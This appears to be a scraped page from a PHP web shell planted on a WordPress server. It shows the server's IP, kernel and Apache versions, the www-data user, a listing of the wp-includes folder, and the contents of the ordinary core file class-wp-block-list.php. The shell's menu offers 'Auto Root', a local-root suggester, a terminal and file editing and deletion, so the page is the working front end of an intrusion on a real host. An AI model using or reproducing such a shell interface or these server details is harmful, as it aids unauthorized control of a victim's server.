Linux v69820.1blu.de 4.15.0 #1 SMP Mon Sep 30 15:36:27 MSK 2024 x86_64
Apache/2.4.58
Server IP : 195.90.215.149 & Your IP : 216.73.216.250
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
cstage /
wp-includes /
Delete
Unzip
Name
Size
Permission
Date
Action
ID3
[ DIR ]
drwxr-xr-x
2026-09-02 14:27
IXR
[ DIR ]
drwxr-xr-x
2026-09-02 21:15
PHPMailer
[ DIR ]
drwxr-xr-x
2026-09-02 12:24
Requests
[ DIR ]
drwxr-xr-x
2026-08-12 08:57
SimplePie
[ DIR ]
drwxr-xr-x
2026-09-01 05:44
Text
[ DIR ]
drwxr-xr-x
2026-09-02 11:14
abilities-api
[ DIR ]
drwxr-xr-x
2026-09-02 10:29
ai-client
[ DIR ]
drwxr-xr-x
2026-08-12 08:57
block-patterns
[ DIR ]
drwxr-xr-x
2026-09-02 09:43
block-supports
[ DIR ]
drwxr-xr-x
2026-09-01 16:34
blocks
[ DIR ]
drwxr-xr-x
2026-09-02 22:23
build
[ DIR ]
drwxr-xr-x
2026-09-01 05:55
certificates
[ DIR ]
drwxr-xr-x
2026-09-02 10:37
css
[ DIR ]
drwxr-xr-x
2026-09-02 09:43
customize
[ DIR ]
drwxr-xr-x
2026-09-01 22:00
fonts
[ DIR ]
drwxr-xr-x
2026-09-02 09:49
html-api
[ DIR ]
drwxr-xr-x
2026-09-02 11:18
images
[ DIR ]
drwxr-xr-x
2026-09-02 10:42
interactivity-api
[ DIR ]
drwxr-xr-x
2026-09-02 13:48
js
[ DIR ]
drwxr-xr-x
2026-09-02 12:23
l10n
[ DIR ]
drwxr-xr-x
2026-08-12 08:57
php-ai-client
[ DIR ]
drwxr-xr-x
2026-09-01 06:11
php-compat
[ DIR ]
drwxr-xr-x
2026-09-02 09:35
pomo
[ DIR ]
drwxr-xr-x
2026-09-01 13:37
rest-api
[ DIR ]
drwxr-xr-x
2026-08-12 08:57
sitemaps
[ DIR ]
drwxr-xr-x
2026-09-02 12:28
sodium_compat
[ DIR ]
drwxr-xr-x
2026-09-02 10:46
style-engine
[ DIR ]
drwxr-xr-x
2026-09-02 09:43
theme-compat
[ DIR ]
drwxr-xr-x
2026-09-02 10:32
widgets
[ DIR ]
drwxr-xr-x
2026-09-02 19:06
bookmark-template.php
12.47
KB
-rw-r--r--
2025-04-16 03:32
class-walker-category.php
8.28
KB
-rw-r--r--
2023-09-08 09:32
class-wp-block-bindings-registry.php
8.07
KB
-rw-r--r--
2026-07-29 12:56
class-wp-block-list.php
4.6
KB
-rw-r--r--
2026-02-08 03:19
class-wp-block-metadata-registry.php
11.57
KB
-rw-r--r--
2026-07-29 12:56
class-wp-block-parser-frame.php
1.95
KB
-rw-r--r--
2026-07-29 12:56
class-wp-block-pattern-categories-registry.php
4.28
KB
-rw-r--r--
2026-07-29 12:56
class-wp-block-patterns-registry.php
10.07
KB
-rw-r--r--
2026-07-29 12:56
class-wp-block-templates-registry.php
6.91
KB
-rw-r--r--
2026-07-29 12:56
class-wp-classic-to-block-menu-converter.php
3.93
KB
-rw-r--r--
2026-07-29 12:56
class-wp-customize-nav-menus.php
56.61
KB
-rw-r--r--
2026-07-29 12:56
class-wp-fatal-error-handler.php
7.96
KB
-rw-r--r--
2024-10-22 10:16
class-wp-http-ixr-client.php
3.43
KB
-rw-r--r--
2026-07-29 12:56
class-wp-http-requests-response.php
4.14
KB
-rw-r--r--
2026-07-29 12:56
class-wp-list-util.php
7.27
KB
-rw-r--r--
2024-02-27 22:38
class-wp-post-type.php
29.95
KB
-rw-r--r--
2026-07-29 12:56
class-wp-recovery-mode-key-service.php
4.8
KB
-rw-r--r--
2026-07-29 12:56
class-wp-text-diff-renderer-table.php
18.49
KB
-rw-r--r--
2026-07-29 12:56
class-wp-theme-json-data.php
1.77
KB
-rw-r--r--
2024-06-04 11:55
class-wp-theme-json-schema.php
7.19
KB
-rw-r--r--
2024-06-06 08:02
default-filters.php
36.54
KB
-rw-r--r--
2026-07-29 12:56
ms-default-filters.php
6.48
KB
-rw-r--r--
2023-02-24 01:23
post-template.php
67.01
KB
-rw-r--r--
2026-07-29 12:56
Save
Rename
<?php /** * Blocks API: WP_Block_List class * * @package WordPress * @since 5.5.0 */ /** * Class representing a list of block instances. * * @since 5.5.0 */ #[AllowDynamicProperties] class WP_Block_List implements Iterator, ArrayAccess, Countable { /** * Original array of parsed block data, or block instances. * * @since 5.5.0 * @var array[]|WP_Block[] */ protected $blocks; /** * All available context of the current hierarchy. * * @since 5.5.0 * @var array */ protected $available_context; /** * Block type registry to use in constructing block instances. * * @since 5.5.0 * @var WP_Block_Type_Registry */ protected $registry; /** * Constructor. * * Populates object properties from the provided block instance argument. * * @since 5.5.0 * * @param array[]|WP_Block[] $blocks Array of parsed block data, or block instances. * @param array $available_context Optional array of ancestry context values. * @param WP_Block_Type_Registry $registry Optional block type registry. */ public function __construct( $blocks, $available_context = array(), $registry = null ) { if ( ! $registry instanceof WP_Block_Type_Registry ) { $registry = WP_Block_Type_Registry::get_instance(); } $this->blocks = $blocks; $this->available_context = $available_context; $this->registry = $registry; } /** * Returns true if a block exists by the specified block offset, or false * otherwise. * * @since 5.5.0 * * @link https://www.php.net/manual/en/arrayaccess.offsetexists.php * * @param int $offset Offset of block to check for. * @return bool Whether block exists. */ #[ReturnTypeWillChange] public function offsetExists( $offset ) { return isset( $this->blocks[ $offset ] ); } /** * Returns the value by the specified block offset. * * @since 5.5.0 * * @link https://www.php.net/manual/en/arrayaccess.offsetget.php * * @param int $offset Offset of block value to retrieve. * @return WP_Block|null Block value if exists, or null. */ #[ReturnTypeWillChange] public function offsetGet( $offset ) { $block = $this->blocks[ $offset ]; if ( isset( $block ) && is_array( $block ) ) { $block = new WP_Block( $block, $this->available_context, $this->registry ); $this->blocks[ $offset ] = $block; } return $block; } /** * Assign a block value by the specified block offset. * * @since 5.5.0 * * @link https://www.php.net/manual/en/arrayaccess.offsetset.php * * @param int $offset Offset of block value to set. * @param array|WP_Block $value Block value. */ #[ReturnTypeWillChange] public function offsetSet( $offset, $value ) { if ( is_null( $offset ) ) { $this->blocks[] = $value; } else { $this->blocks[ $offset ] = $value; } } /** * Unset a block. * * @since 5.5.0 * * @link https://www.php.net/manual/en/arrayaccess.offsetunset.php * * @param int $offset Offset of block value to unset. */ #[ReturnTypeWillChange] public function offsetUnset( $offset ) { unset( $this->blocks[ $offset ] ); } /** * Rewinds back to the first element of the Iterator. * * @since 5.5.0 * * @link https://www.php.net/manual/en/iterator.rewind.php */ #[ReturnTypeWillChange] public function rewind() { reset( $this->blocks ); } /** * Returns the current element of the block list. * * @since 5.5.0 * * @link https://www.php.net/manual/en/iterator.current.php * * @return WP_Block|null Current element. */ #[ReturnTypeWillChange] public function current() { return $this->offsetGet( $this->key() ); } /** * Returns the key of the current element of the block list. * * @since 5.5.0 * * @link https://www.php.net/manual/en/iterator.key.php * * @return int|null Key of the current element. */ #[ReturnTypeWillChange] public function key() { return key( $this->blocks ); } /** * Moves the current position of the block list to the next element. * * @since 5.5.0 * * @link https://www.php.net/manual/en/iterator.next.php */ #[ReturnTypeWillChange] public function next() { next( $this->blocks ); } /** * Checks if current position is valid. * * @since 5.5.0 * * @link https://www.php.net/manual/en/iterator.valid.php */ #[ReturnTypeWillChange] public function valid() { return null !== key( $this->blocks ); } /** * Returns the count of blocks in the list. * * @since 5.5.0 * * @link https://www.php.net/manual/en/countable.count.php * * @return int Block count. */ #[ReturnTypeWillChange] public function count() { return count( $this->blocks ); } }